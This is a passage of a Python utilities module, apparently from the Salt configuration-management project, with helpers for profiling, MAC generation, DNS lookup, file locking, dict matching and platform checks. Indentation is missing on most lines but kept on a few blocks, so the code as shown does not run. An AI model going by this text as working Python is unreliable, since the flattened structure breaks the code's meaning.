date = datetime.datetime.now().isoformat()
if id_ is None:
id_ = rand_str(size=32)
ficp = os.path.join(stats_path, '{0}.{1}.pstats'.format(id_, date))
fico = os.path.join(stats_path, '{0}.{1}.dot'.format(id_, date))
ficn = os.path.join(stats_path, '{0}.{1}.stats'.format(id_, date))
if not os.path.exists(ficp):
pr.dump_stats(ficp)
with open(ficn, 'w') as fic:
pstats.Stats(pr, stream=fic).sort_stats('cumulative')
log.info('PROFILING: {0} generated'.format(ficp))
log.info('PROFILING (cumulative): {0} generated'.format(ficn))
            pyprof = which('pyprof2calltree')
            cmd = [pyprof, '-i', ficp, '-o', fico]
            if pyprof:
                failed = False
                try:
                    pro = subprocess.Popen(
                        cmd, shell=False,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                    # wait for completion so the return code is meaningful;
                    # also avoids referencing 'pro' when Popen itself failed
                    pro.wait()
                    if pro.returncode:
                        failed = True
                except OSError:
                    failed = True
                if failed:
                    log.error('PROFILING (dot) generation failed')
                else:
                    log.info('PROFILING (dot): {0} generated'.format(fico))
                    log.trace('pyprof2calltree output:')
                    log.trace(to_str(pro.stdout.read()).strip() +
                              to_str(pro.stderr.read()).strip())
            else:
                log.info('You can run \'pyprof2calltree -i {0} -o {1}\' '
                         'for additional stats.'.format(ficp, fico))
finally:
if not stop:
pr.enable()
return pr
def list_files(directory):
'''
Return a list of all files found under directory
'''
ret = set()
ret.add(directory)
for root, dirs, files in safe_walk(directory):
for name in files:
ret.add(os.path.join(root, name))
for name in dirs:
ret.add(os.path.join(root, name))
return list(ret)
def gen_mac(prefix='AC:DE:48'):
'''
Generates a MAC address with the defined OUI prefix.
Common prefixes:
- ``00:16:3E`` -- Xen
- ``00:18:51`` -- OpenVZ
- ``00:50:56`` -- VMware (manually generated)
- ``52:54:00`` -- QEMU/KVM
- ``AC:DE:48`` -- PRIVATE
References:
- http://standards.ieee.org/develop/regauth/oui/oui.txt
- https://www.wireshark.org/tools/oui-lookup.html
- https://en.wikipedia.org/wiki/MAC_address
'''
return '{0}:{1:02X}:{2:02X}:{3:02X}'.format(prefix,
random.randint(0, 0xff),
random.randint(0, 0xff),
random.randint(0, 0xff))
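# Illustrative output (editor's example; the last three octets are random, so
# values will differ on every call):
#
#     >>> gen_mac()               # doctest: +SKIP
#     'AC:DE:48:2B:0C:9F'
#     >>> gen_mac('00:16:3E')     # doctest: +SKIP
#     '00:16:3E:7A:41:D2'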
def mac_str_to_bytes(mac_str):
'''
Convert a MAC address string into bytes. Works with or without separators:
b1 = mac_str_to_bytes('08:00:27:13:69:77')
b2 = mac_str_to_bytes('080027136977')
assert b1 == b2
assert isinstance(b1, bytes)
'''
if len(mac_str) == 12:
pass
elif len(mac_str) == 17:
sep = mac_str[2]
mac_str = mac_str.replace(sep, '')
else:
raise ValueError('Invalid MAC address')
if six.PY3:
mac_bytes = bytes(int(mac_str[s:s+2], 16) for s in range(0, 12, 2))
else:
mac_bytes = ''.join(chr(int(mac_str[s:s+2], 16)) for s in range(0, 12, 2))
return mac_bytes
def ip_bracket(addr):
'''
Convert IP address representation to ZMQ (URL) format. ZMQ expects
brackets around IPv6 literals, since they are used in URLs.
'''
if addr and ':' in addr and not addr.startswith('['):
return '[{0}]'.format(addr)
return addr
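# Illustrative usage (editor's examples): IPv6 literals get bracketed for use
# in ZMQ URLs, everything else passes through unchanged:
#
#     >>> ip_bracket('::1')
#     '[::1]'
#     >>> ip_bracket('127.0.0.1')
#     '127.0.0.1'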
def dns_check(addr, safe=False, ipv6=False):
'''
Return the ip resolved by dns, but do not exit on failure, only raise an
exception. Obeys system preference for IPv4/6 address resolution.
'''
error = False
try:
# issue #21397: force glibc to re-read resolv.conf
if HAS_RESINIT:
res_init()
hostnames = socket.getaddrinfo(
addr, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not hostnames:
error = True
else:
addr = False
for h in hostnames:
if h[0] == socket.AF_INET or (h[0] == socket.AF_INET6 and ipv6):
addr = ip_bracket(h[4][0])
break
if not addr:
error = True
except TypeError:
        err = ('Attempt to resolve address \'{0}\' failed. Invalid or unresolvable address').format(addr)
raise SaltSystemExit(code=42, msg=err)
except socket.error:
error = True
if error:
err = ('DNS lookup of \'{0}\' failed.').format(addr)
if safe:
if salt.log.is_console_configured():
# If logging is not configured it also means that either
# the master or minion instance calling this hasn't even
# started running
log.error(err)
raise SaltClientError()
raise SaltSystemExit(code=42, msg=err)
return addr
def required_module_list(docstring=None):
'''
Return a list of python modules required by a salt module that aren't
in stdlib and don't exist on the current pythonpath.
'''
if not docstring:
return []
ret = []
modules = parse_docstring(docstring).get('deps', [])
for mod in modules:
try:
imp.find_module(mod)
except ImportError:
ret.append(mod)
return ret
def required_modules_error(name, docstring):
'''
Pretty print error messages in critical salt modules which are
missing deps not always in stdlib such as win32api on windows.
'''
modules = required_module_list(docstring)
if not modules:
return ''
filename = os.path.basename(name).split('.')[0]
msg = '\'{0}\' requires these python modules: {1}'
return msg.format(filename, ', '.join(modules))
def get_accumulator_dir(cachedir):
'''
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
'''
fn_ = os.path.join(cachedir, 'accumulator')
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def check_or_die(command):
'''
Simple convenience function for modules to use for gracefully blowing up
if a required tool is not available in the system path.
Lazily import `salt.modules.cmdmod` to avoid any sort of circular
dependencies.
'''
if command is None:
raise CommandNotFoundError('\'None\' is not a valid command.')
if not which(command):
raise CommandNotFoundError('\'{0}\' is not in the path'.format(command))
def backup_minion(path, bkroot):
'''
Backup a file on the minion
'''
dname, bname = os.path.split(path)
if salt.utils.is_windows():
src_dir = dname.replace(':', '_')
else:
src_dir = dname[1:]
if not salt.utils.is_windows():
fstat = os.stat(path)
msecs = str(int(time.time() * 1000000))[-6:]
if salt.utils.is_windows():
# ':' is an illegal filesystem path character on Windows
stamp = time.strftime('%a_%b_%d_%H-%M-%S_%Y')
else:
stamp = time.strftime('%a_%b_%d_%H:%M:%S_%Y')
stamp = '{0}{1}_{2}'.format(stamp[:-4], msecs, stamp[-4:])
bkpath = os.path.join(bkroot,
src_dir,
'{0}_{1}'.format(bname, stamp))
if not os.path.isdir(os.path.dirname(bkpath)):
os.makedirs(os.path.dirname(bkpath))
shutil.copyfile(path, bkpath)
if not salt.utils.is_windows():
os.chown(bkpath, fstat.st_uid, fstat.st_gid)
os.chmod(bkpath, fstat.st_mode)
def path_join(*parts):
'''
This functions tries to solve some issues when joining multiple absolute
paths on both *nix and windows platforms.
See tests/unit/utils/path_join_test.py for some examples on what's being
talked about here.
'''
# Normalize path converting any os.sep as needed
parts = [os.path.normpath(p) for p in parts]
root = parts.pop(0)
if not parts:
return root
if is_windows():
if len(root) == 1:
root += ':'
root = root.rstrip(os.sep) + os.sep
return os.path.normpath(os.path.join(
root, *[p.lstrip(os.sep) for p in parts]
))
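# Illustrative usage on a POSIX system (editor's example; Windows drive-letter
# handling follows the is_windows() branch above):
#
#     >>> path_join('/usr', '/local', 'bin')
#     '/usr/local/bin'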
def pem_finger(path=None, key=None, sum_type='sha256'):
'''
Pass in either a raw pem string, or the path on disk to the location of a
pem file, and the type of cryptographic hash to use. The default is SHA256.
The fingerprint of the pem will be returned.
If neither a key nor a path are passed in, a blank string will be returned.
'''
if not key:
if not os.path.isfile(path):
return ''
with fopen(path, 'rb') as fp_:
key = ''.join([x for x in fp_.readlines() if x.strip()][1:-1])
pre = getattr(hashlib, sum_type)(key).hexdigest()
finger = ''
for ind in range(len(pre)):
if ind % 2:
# Is odd
finger += '{0}:'.format(pre[ind])
else:
finger += pre[ind]
return finger.rstrip(':')
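# Output shape (editor's note): the hexdigest is grouped into colon-separated
# byte pairs, so a digest beginning 'deadbeef...' renders as 'de:ad:be:ef:...'.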
def build_whitespace_split_regex(text):
'''
Create a regular expression at runtime which should match ignoring the
addition or deletion of white space or line breaks, unless between commas
Example:
    .. code-block:: python
>>> import re
>>> from salt.utils import *
>>> regex = build_whitespace_split_regex(
... """if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then"""
... )
>>> regex
'(?:[\\s]+)?if(?:[\\s]+)?\\[(?:[\\s]+)?\\-z(?:[\\s]+)?\\"\\$debian'
'\\_chroot\\"(?:[\\s]+)?\\](?:[\\s]+)?\\&\\&(?:[\\s]+)?\\[(?:[\\s]+)?'
'\\-r(?:[\\s]+)?\\/etc\\/debian\\_chroot(?:[\\s]+)?\\]\\;(?:[\\s]+)?'
'then(?:[\\s]+)?'
>>> re.search(
... regex,
... """if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then"""
... )
<_sre.SRE_Match object at 0xb70639c0>
>>>
'''
def __build_parts(text):
lexer = shlex.shlex(text)
lexer.whitespace_split = True
lexer.commenters = ''
if '\'' in text:
lexer.quotes = '"'
elif '"' in text:
lexer.quotes = '\''
return list(lexer)
regex = r''
for line in text.splitlines():
parts = [re.escape(s) for s in __build_parts(line)]
regex += r'(?:[\s]+)?{0}(?:[\s]+)?'.format(r'(?:[\s]+)?'.join(parts))
return r'(?m)^{0}$'.format(regex)
def format_call(fun,
data,
initial_ret=None,
expected_extra_kws=()):
'''
Build the required arguments and keyword arguments required for the passed
function.
:param fun: The function to get the argspec from
:param data: A dictionary containing the required data to build the
arguments and keyword arguments.
:param initial_ret: The initial return data pre-populated as dictionary or
None
:param expected_extra_kws: Any expected extra keyword argument names which
should not trigger a :ref:`SaltInvocationError`
:returns: A dictionary with the function required arguments and keyword
arguments.
'''
ret = initial_ret is not None and initial_ret or {}
ret['args'] = []
ret['kwargs'] = {}
aspec = salt.utils.args.get_function_argspec(fun)
arg_data = arg_lookup(fun)
args = arg_data['args']
kwargs = arg_data['kwargs']
# Since we WILL be changing the data dictionary, let's change a copy of it
data = data.copy()
missing_args = []
for key in kwargs:
try:
kwargs[key] = data.pop(key)
except KeyError:
# Let's leave the default value in place
pass
while args:
arg = args.pop(0)
try:
ret['args'].append(data.pop(arg))
except KeyError:
missing_args.append(arg)
if missing_args:
used_args_count = len(ret['args']) + len(args)
args_count = used_args_count + len(missing_args)
raise SaltInvocationError(
'{0} takes at least {1} argument{2} ({3} given)'.format(
fun.__name__,
args_count,
args_count > 1 and 's' or '',
used_args_count
)
)
ret['kwargs'].update(kwargs)
if aspec.keywords:
        # The function accepts **kwargs, so any non-expected extra keyword
        # arguments will be made available.
for key, value in six.iteritems(data):
if key in expected_extra_kws:
continue
ret['kwargs'][key] = value
# No need to check for extra keyword arguments since they are all
# **kwargs now. Return
return ret
# Did not return yet? Lets gather any remaining and unexpected keyword
# arguments
extra = {}
for key, value in six.iteritems(data):
if key in expected_extra_kws:
continue
extra[key] = copy.deepcopy(value)
# We'll be showing errors to the users until Salt Carbon comes out, after
# which, errors will be raised instead.
warn_until(
'Carbon',
'It\'s time to start raising `SaltInvocationError` instead of '
'returning warnings',
# Let's not show the deprecation warning on the console, there's no
# need.
_dont_call_warnings=True
)
if extra:
# Found unexpected keyword arguments, raise an error to the user
if len(extra) == 1:
msg = '\'{0[0]}\' is an invalid keyword argument for \'{1}\''.format(
list(extra.keys()),
ret.get(
# In case this is being called for a state module
'full',
# Not a state module, build the name
'{0}.{1}'.format(fun.__module__, fun.__name__)
)
)
else:
msg = '{0} and \'{1}\' are invalid keyword arguments for \'{2}\''.format(
', '.join(['\'{0}\''.format(e) for e in extra][:-1]),
list(extra.keys())[-1],
ret.get(
# In case this is being called for a state module
'full',
# Not a state module, build the name
'{0}.{1}'.format(fun.__module__, fun.__name__)
)
)
# Return a warning to the user explaining what's going on
ret.setdefault('warnings', []).append(
'{0}. If you were trying to pass additional data to be used '
'in a template context, please populate \'context\' with '
'\'key: value\' pairs. Your approach will work until Salt '
'Carbon is out.{1}'.format(
msg,
'' if 'full' not in ret else ' Please update your state files.'
)
)
# Lets pack the current extra kwargs as template context
ret.setdefault('context', {}).update(extra)
return ret
def arg_lookup(fun):
'''
Return a dict containing the arguments and default arguments to the
function.
'''
ret = {'kwargs': {}}
aspec = salt.utils.args.get_function_argspec(fun)
if aspec.defaults:
ret['kwargs'] = dict(zip(aspec.args[::-1], aspec.defaults[::-1]))
ret['args'] = [arg for arg in aspec.args if arg not in ret['kwargs']]
return ret
def istextfile(fp_, blocksize=512):
'''
Uses heuristics to guess whether the given file is text or binary,
by reading a single block of bytes from the file.
If more than 30% of the chars in the block are non-text, or there
are NUL ('\x00') bytes in the block, assume this is a binary file.
'''
int2byte = (lambda x: bytes((x,))) if six.PY3 else chr
text_characters = (
b''.join(int2byte(i) for i in range(32, 127)) +
b'\n\r\t\f\b')
try:
block = fp_.read(blocksize)
except AttributeError:
# This wasn't an open filehandle, so treat it as a file path and try to
# open the file
try:
with fopen(fp_, 'rb') as fp2_:
block = fp2_.read(blocksize)
except IOError:
# Unable to open file, bail out and return false
return False
if b'\x00' in block:
# Files with null bytes are binary
return False
elif not block:
# An empty file is considered a valid text file
return True
try:
block.decode('utf-8')
return True
except UnicodeDecodeError:
pass
nontext = block.translate(None, text_characters)
return float(len(nontext)) / len(block) <= 0.30
def isorted(to_sort):
'''
Sort a list of strings ignoring case.
>>> L = ['foo', 'Foo', 'bar', 'Bar']
>>> sorted(L)
['Bar', 'Foo', 'bar', 'foo']
>>> sorted(L, key=lambda x: x.lower())
['bar', 'Bar', 'foo', 'Foo']
>>>
'''
return sorted(to_sort, key=lambda x: x.lower())
def mysql_to_dict(data, key):
'''
Convert MySQL-style output to a python dictionary
'''
ret = {}
headers = ['']
for line in data:
if not line:
continue
if line.startswith('+'):
continue
comps = line.split('|')
for comp in range(len(comps)):
comps[comp] = comps[comp].strip()
if len(headers) > 1:
index = len(headers) - 1
row = {}
for field in range(index):
if field < 1:
continue
else:
row[headers[field]] = str_to_num(comps[field])
ret[row[key]] = row
else:
headers = comps
return ret
def contains_whitespace(text):
'''
Returns True if there are any whitespace characters in the string
'''
return any(x.isspace() for x in text)
def str_to_num(text):
'''
Convert a string to a number.
Returns an integer if the string represents an integer, a floating
point number if the string is a real number, or the string unchanged
otherwise.
'''
try:
return int(text)
except ValueError:
try:
return float(text)
except ValueError:
return text
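# Illustrative usage (editor's examples):
#
#     >>> str_to_num('42')
#     42
#     >>> str_to_num('2.5')
#     2.5
#     >>> str_to_num('n/a')
#     'n/a'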
def fopen(*args, **kwargs):
'''
Wrapper around open() built-in to set CLOEXEC on the fd.
This flag specifies that the file descriptor should be closed when an exec
function is invoked;
When a file descriptor is allocated (as with open or dup), this bit is
initially cleared on the new file descriptor, meaning that descriptor will
survive into the new program after exec.
NB! We still have small race condition between open and fcntl.
'''
# ensure 'binary' mode is always used on windows
if kwargs.pop('binary', True):
if is_windows():
if len(args) > 1:
args = list(args)
if 'b' not in args[1]:
args[1] += 'b'
elif kwargs.get('mode', None):
if 'b' not in kwargs['mode']:
kwargs['mode'] += 'b'
else:
# the default is to read
kwargs['mode'] = 'rb'
fhandle = open(*args, **kwargs)
if is_fcntl_available():
# modify the file descriptor on systems with fcntl
# unix and unix-like systems only
try:
FD_CLOEXEC = fcntl.FD_CLOEXEC # pylint: disable=C0103
except AttributeError:
FD_CLOEXEC = 1 # pylint: disable=C0103
old_flags = fcntl.fcntl(fhandle.fileno(), fcntl.F_GETFD)
fcntl.fcntl(fhandle.fileno(), fcntl.F_SETFD, old_flags | FD_CLOEXEC)
return fhandle
@contextlib.contextmanager
def flopen(*args, **kwargs):
'''
Shortcut for fopen with lock and context manager
'''
with fopen(*args, **kwargs) as fhandle:
try:
if is_fcntl_available(check_sunos=True):
fcntl.flock(fhandle.fileno(), fcntl.LOCK_SH)
yield fhandle
finally:
if is_fcntl_available(check_sunos=True):
fcntl.flock(fhandle.fileno(), fcntl.LOCK_UN)
@contextlib.contextmanager
def fpopen(*args, **kwargs):
'''
Shortcut for fopen with extra uid, gid and mode options.
Supported optional Keyword Arguments:
mode: explicit mode to set. Mode is anything os.chmod
would accept as input for mode. Works only on unix/unix
like systems.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the path is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the path is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
# Remove uid, gid and mode from kwargs if present
uid = kwargs.pop('uid', -1) # -1 means no change to current uid
gid = kwargs.pop('gid', -1) # -1 means no change to current gid
mode = kwargs.pop('mode', None)
with fopen(*args, **kwargs) as fhandle:
path = args[0]
d_stat = os.stat(path)
if hasattr(os, 'chown'):
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(path, uid, gid)
if mode is not None:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode:
os.chmod(path, (d_stat.st_mode ^ mode_part) | mode)
yield fhandle
def expr_match(line, expr):
'''
Evaluate a line of text against an expression. First try a full-string
match, next try globbing, and then try to match assuming expr is a regular
expression. Originally designed to match minion IDs for
whitelists/blacklists.
'''
if line == expr:
return True
if fnmatch.fnmatch(line, expr):
return True
try:
if re.match(r'\A{0}\Z'.format(expr), line):
return True
except re.error:
pass
return False
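# Illustrative usage with minion-ID style strings (editor's examples):
#
#     >>> expr_match('web01', 'web01')      # exact string match
#     True
#     >>> expr_match('web01', 'web*')       # glob match
#     True
#     >>> expr_match('web01', r'web\d+')    # regex, anchored as \A...\Z
#     True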
def check_whitelist_blacklist(value, whitelist=None, blacklist=None):
'''
Check a whitelist and/or blacklist to see if the value matches it.
'''
if not any((whitelist, blacklist)):
return True
in_whitelist = False
in_blacklist = False
if whitelist:
if not isinstance(whitelist, list):
whitelist = [whitelist]
try:
for expr in whitelist:
if expr_match(value, expr):
in_whitelist = True
break
except TypeError:
log.error('Non-iterable whitelist {0}'.format(whitelist))
whitelist = None
else:
whitelist = None
if blacklist:
if not isinstance(blacklist, list):
blacklist = [blacklist]
try:
for expr in blacklist:
if expr_match(value, expr):
in_blacklist = True
break
except TypeError:
            log.error('Non-iterable blacklist {0}'.format(blacklist))
blacklist = None
else:
blacklist = None
if whitelist and not blacklist:
ret = in_whitelist
elif blacklist and not whitelist:
ret = not in_blacklist
elif whitelist and blacklist:
ret = in_whitelist and not in_blacklist
else:
ret = True
return ret
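# Illustrative usage (editor's examples): when both lists are supplied, the
# value must match the whitelist AND miss the blacklist:
#
#     >>> check_whitelist_blacklist('minion1', whitelist=['minion*'])
#     True
#     >>> check_whitelist_blacklist('minion1', whitelist=['minion*'],
#     ...                           blacklist=['minion1'])
#     False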
def subdict_match(data,
expr,
delimiter=DEFAULT_TARGET_DELIM,
regex_match=False,
exact_match=False):
'''
Check for a match in a dictionary using a delimiter character to denote
levels of subdicts, and also allowing the delimiter character to be
matched. Thus, 'foo:bar:baz' will match data['foo'] == 'bar:baz' and
data['foo']['bar'] == 'baz'. The former would take priority over the
latter.
'''
def _match(target, pattern, regex_match=False, exact_match=False):
if regex_match:
try:
return re.match(pattern.lower(), str(target).lower())
except Exception:
log.error('Invalid regex \'{0}\' in match'.format(pattern))
return False
elif exact_match:
return str(target).lower() == pattern.lower()
else:
return fnmatch.fnmatch(str(target).lower(), pattern.lower())
def _dict_match(target, pattern, regex_match=False, exact_match=False):
wildcard = pattern.startswith('*:')
if wildcard:
pattern = pattern[2:]
if pattern == '*':
# We are just checking that the key exists
return True
elif pattern in target:
# We might want to search for a key
return True
elif subdict_match(target,
pattern,
regex_match=regex_match,
exact_match=exact_match):
return True
if wildcard:
for key in target.keys():
if _match(key,
pattern,
regex_match=regex_match,
exact_match=exact_match):
return True
if isinstance(target[key], dict):
if _dict_match(target[key],
pattern,
regex_match=regex_match,
exact_match=exact_match):
return True
elif isinstance(target[key], list):
for item in target[key]:
if _match(item,
pattern,
regex_match=regex_match,
exact_match=exact_match):
return True
return False
for idx in range(1, expr.count(delimiter) + 1):
splits = expr.split(delimiter)
key = delimiter.join(splits[:idx])
matchstr = delimiter.join(splits[idx:])
log.debug('Attempting to match \'{0}\' in \'{1}\' using delimiter '
'\'{2}\''.format(matchstr, key, delimiter))
match = traverse_dict_and_list(data, key, {}, delimiter=delimiter)
if match == {}:
continue
if isinstance(match, dict):
if _dict_match(match,
matchstr,
regex_match=regex_match,
exact_match=exact_match):
return True
continue
if isinstance(match, list):
# We are matching a single component to a single list member
for member in match:
if isinstance(member, dict):
if _dict_match(member,
matchstr,
regex_match=regex_match,
exact_match=exact_match):
return True
if _match(member,
matchstr,
regex_match=regex_match,
exact_match=exact_match):
return True
continue
if _match(match,
matchstr,
regex_match=regex_match,
exact_match=exact_match):
return True
return False
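# Illustrative usage (editor's examples): both nesting and embedded delimiters
# are matched, as described in the docstring above:
#
#     >>> subdict_match({'foo': {'bar': 'baz'}}, 'foo:bar:baz')
#     True
#     >>> subdict_match({'foo': 'bar:baz'}, 'foo:bar:baz')
#     True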
def traverse_dict(data, key, default, delimiter=DEFAULT_TARGET_DELIM):
'''
Traverse a dict using a colon-delimited (or otherwise delimited, using the
'delimiter' param) target string. The target 'foo:bar:baz' will return
data['foo']['bar']['baz'] if this value exists, and will otherwise return
the dict in the default argument.
'''
try:
for each in key.split(delimiter):
data = data[each]
except (KeyError, IndexError, TypeError):
# Encountered a non-indexable value in the middle of traversing
return default
return data
def traverse_dict_and_list(data, key, default, delimiter=DEFAULT_TARGET_DELIM):
'''
Traverse a dict or list using a colon-delimited (or otherwise delimited,
using the 'delimiter' param) target string. The target 'foo:bar:0' will
return data['foo']['bar'][0] if this value exists, and will otherwise
return the dict in the default argument.
Function will automatically determine the target type.
    The target 'foo:bar:0' will return data['foo']['bar'][0] if the data is
    shaped like {'foo': {'bar': ['baz']}}; if it is shaped like
    {'foo': {'bar': {'0': 'baz'}}}, then data['foo']['bar']['0'] is returned.
'''
for each in key.split(delimiter):
if isinstance(data, list):
try:
idx = int(each)
except ValueError:
embed_match = False
# Index was not numeric, lets look at any embedded dicts
for embedded in (x for x in data if isinstance(x, dict)):
try:
data = embedded[each]
embed_match = True
break
except KeyError:
pass
if not embed_match:
# No embedded dicts matched, return the default
return default
else:
try:
data = data[idx]
except IndexError:
return default
else:
try:
data = data[each]
except (KeyError, TypeError):
return default
return data
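# Illustrative usage (editor's examples):
#
#     >>> traverse_dict_and_list({'foo': {'bar': ['baz']}}, 'foo:bar:0', 'dflt')
#     'baz'
#     >>> traverse_dict_and_list({'foo': {'bar': ['baz']}}, 'foo:qux', 'dflt')
#     'dflt'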
def mkstemp(*args, **kwargs):
'''
Helper function which does exactly what `tempfile.mkstemp()` does but
accepts another argument, `close_fd`, which, by default, is true and closes
the fd before returning the file path. Something commonly done throughout
Salt's code.
'''
close_fd = kwargs.pop('close_fd', True)
fd_, fpath = tempfile.mkstemp(*args, **kwargs)
if close_fd is False:
return (fd_, fpath)
os.close(fd_)
del fd_
return fpath
def clean_kwargs(**kwargs):
'''
Return a dict without any of the __pub* keys (or any other keys starting
with a dunder) from the kwargs dict passed into the execution module
functions. These keys are useful for tracking what was used to invoke
    the function call, but they may not be desirable to have if passing the
kwargs forward wholesale.
'''
ret = {}
for key, val in six.iteritems(kwargs):
if not key.startswith('__'):
ret[key] = val
return ret
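# Illustrative usage (editor's example; '__pub_user' stands in for the
# tracking keys injected by the publisher):
#
#     >>> clean_kwargs(__pub_user='root', refresh=True)
#     {'refresh': True}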
@real_memoize
def is_windows():
'''
Simple function to return if a host is Windows or not
'''
return sys.platform.startswith('win')
def sanitize_win_path_string(winpath):
'''
Remove illegal path characters for windows
'''
intab = '<>:|?*'
outtab = '_' * len(intab)
trantab = ''.maketrans(intab, outtab) if six.PY3 else string.maketrans(intab, outtab)
if isinstance(winpath, str):
winpath = winpath.translate(trantab)
elif isinstance(winpath, six.text_type):
winpath = winpath.translate(dict((ord(c), u'_') for c in intab))
return winpath
@real_memoize
def is_proxy():
'''
Return True if this minion is a proxy minion.
    Leverages the fact that is_linux() and is_windows() both return False
    for proxies.
TODO: Need to extend this for proxies that might run on
other Unices
'''
import __main__ as main
# This is a hack. If a proxy minion is started by other
# means, e.g. a custom script that creates the minion objects
# then this will fail.
is_proxy = False
try:
if 'salt-proxy' in main.__file__:
is_proxy = True
except AttributeError:
pass
return is_proxy
@real_memoize
def is_linux():
'''
Simple function to return if a host is Linux or not.
Note for a proxy minion, we need to return something else
'''
return sys.platform.startswith('linux')
@real_memoize
def is_darwin():
'''
Simple function to return if a host is Darwin (OS X) or not
'''
return sys.platform.startswith('darwin')
@real_memoize
def is_sunos():
'''
Simple function to return if host is SunOS or not
'''
return sys.platform.startswith('sunos')
@real_memoize
def is_smartos():
'''
Simple function to return if host is SmartOS (Illumos) or not
'''
if not is_sunos():
return False
else:
return os.uname()[3].startswith('joyent_')
@real_memoize
def is_smartos_globalzone():
'''
Function to return if host is SmartOS (Illumos) global zone or not
'''
if not is_smartos():
return False
else:
cmd = ['zonename']
try:
zonename = subprocess.Popen(
cmd, shell=False,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError:
return False
if zonename.returncode:
return False
if zonename.stdout.read().strip() == 'global':
return True
return False
@real_memoize
def is_smartos_zone():
'''
Function to return if host is SmartOS (Illumos) and not the gz
'''
if not is_smartos():
return False
else:
cmd = ['zonename']
try:
zonename = subprocess.Popen(
cmd, shell=False,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError:
return False
if zonename.returncode:
return False
if zonename.stdout.read().strip() == 'global':
return False
return True
@real_memoize
def is_freebsd():
'''
Simple function to return if host is FreeBSD or not
'''
return sys.platform.startswith('freebsd')
@real_memoize
def is_openbsd():
'''
Simple function to return if host is OpenBSD or not
'''
return sys.platform.startswith('openbsd')
def is_fcntl_available(check_sunos=False):
'''
Simple function to check if the `fcntl` module is available or not.
If `check_sunos` is passed as `True` an additional check to see if host is
SunOS is also made. For additional information see: http://goo.gl/159FF8
'''
if check_sunos and is_sunos():
return False
return HAS_FCNTL
def check_include_exclude(path_str, include_pat=None, exclude_pat=None):
'''
Check for glob or regexp patterns for include_pat and exclude_pat in the
'path_str' string and return True/False conditions as follows.
- Default: return 'True' if no include_pat or exclude_pat patterns are
supplied
- If only include_pat or exclude_pat is supplied: return 'True' if string
passes the include_pat test or fails exclude_pat test respectively
- If both include_pat and exclude_pat are supplied: return 'True' if
include_pat matches AND exclude_pat does not match
'''
ret = True # -- default true
# Before pattern match, check if it is regexp (E@'') or glob(default)
if include_pat:
if re.match('E@', include_pat):
retchk_include = True if re.search(
include_pat[2:],
path_str
) else False
else:
retchk_include = True if fnmatch.fnmatch(
path_str,
include_pat
) else False
if exclude_pat:
if re.match('E@', exclude_pat):
retchk_exclude = False if re.search(
exclude_pat[2:],
path_str
) else True
else:
retchk_exclude = False if fnmatch.fnmatch(
path_str,
exclude_pat
) else True
# Now apply include/exclude conditions
if include_pat and not exclude_pat:
ret = retchk_include
elif exclude_pat and not include_pat:
ret = retchk_exclude
elif include_pat and exclude_pat:
ret = retchk_include and retchk_exclude
else:
ret = True
return ret
def gen_state_tag(low):
'''
Generate the running dict tag string from the low data structure
'''
return '{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}'.format(low)
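# Illustrative usage (editor's example; the low-data values are hypothetical):
#
#     >>> low = {'state': 'file', '__id__': 'deploy_conf',
#     ...        'name': '/etc/app.conf', 'fun': 'managed'}
#     >>> gen_state_tag(low)
#     'file_|-deploy_conf_|-/etc/app.conf_|-managed'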
def check_state_result(running, recurse=False):
'''
Check the total return value of the run and determine if the running
dict has any issues
'''
if not isinstance(running, dict):
return False
if not running:
return False
ret = True
for state_result in six.itervalues(running):
if not recurse and not isinstance(state_result, dict):
ret = False
if ret and isinstance(state_result, dict):
result = state_result.get('result', _empty)
if result is False:
ret = False
# only override return value if we are not already failed
elif result is _empty and isinstance(state_result, dict) and ret:
ret = check_state_result(state_result, recurse=True)
# return as soon as we got a failure
if not ret:
break
return ret
def test_mode(**kwargs):
'''
    Examines the kwargs passed and returns True if any kwarg matching
    "test" in any variation of capitalization (e.g. "TEST", "Test", "TeSt",
    etc.) contains a True value (as determined by salt.utils.is_true).
'''
for arg, value in six.iteritems(kwargs):
try:
if arg.lower() == 'test' and is_true(value):
return True
except AttributeError:
continue
return False
def is_true(value=None):
'''
Returns a boolean value representing the "truth" of the value passed. The
rules for what is a "True" value are:
1. Integer/float values greater than 0
2. The string values "True" and "true"
3. Any object for which bool(obj) returns True
'''
# First, try int/float conversion
try:
value = int(value)
except (ValueError, TypeError):
pass
try:
value = float(value)
except (ValueError, TypeError):
pass
# Now check for truthiness
if isinstance(value, (int, float)):
return value > 0
elif isinstance(value, six.string_types):
return str(value).lower() == 'true'
else:
return bool(value)
def exactly_n(l, n=1):
'''
Tests that exactly N items in an iterable are "truthy" (neither None,
False, nor 0).
'''
i = iter(l)
return all(any(i) for j in range(n)) and not any(i)
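# How the single iterator above works (editor's note): each any(i) advances
# the shared iterator until it finds a truthy item (done n times), and the
# final not any(i) verifies no further truthy items remain. Examples:
#
#     >>> exactly_n([0, 'a', '', None])
#     True
#     >>> exactly_n([1, 2], n=2)
#     True
#     >>> exactly_n([1, 2])
#     False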
def exactly_one(l):
'''
Check if only one item is not None, False, or 0 in an iterable.
'''
return exactly_n(l)
def rm_rf(path):
'''
Platform-independent recursive delete. Includes code from
http://stackoverflow.com/a/2656405
'''
def _onerror(func, path, exc_info):
'''
Error handler for `shutil.rmtree`.
If the error is due to an access error (read only file)
it attempts to add write permission and then retries.
If the error is for another reason it re-raises the error.
Usage : `shutil.rmtree(path, onerror=onerror)`
'''
if is_windows() and not os.access(path, os.W_OK):
# Is the error an access error ?
os.chmod(path, stat.S_IWUSR)
func(path)
else:
raise # pylint: disable=E0704
shutil.rmtree(path, onerror=_onerror)
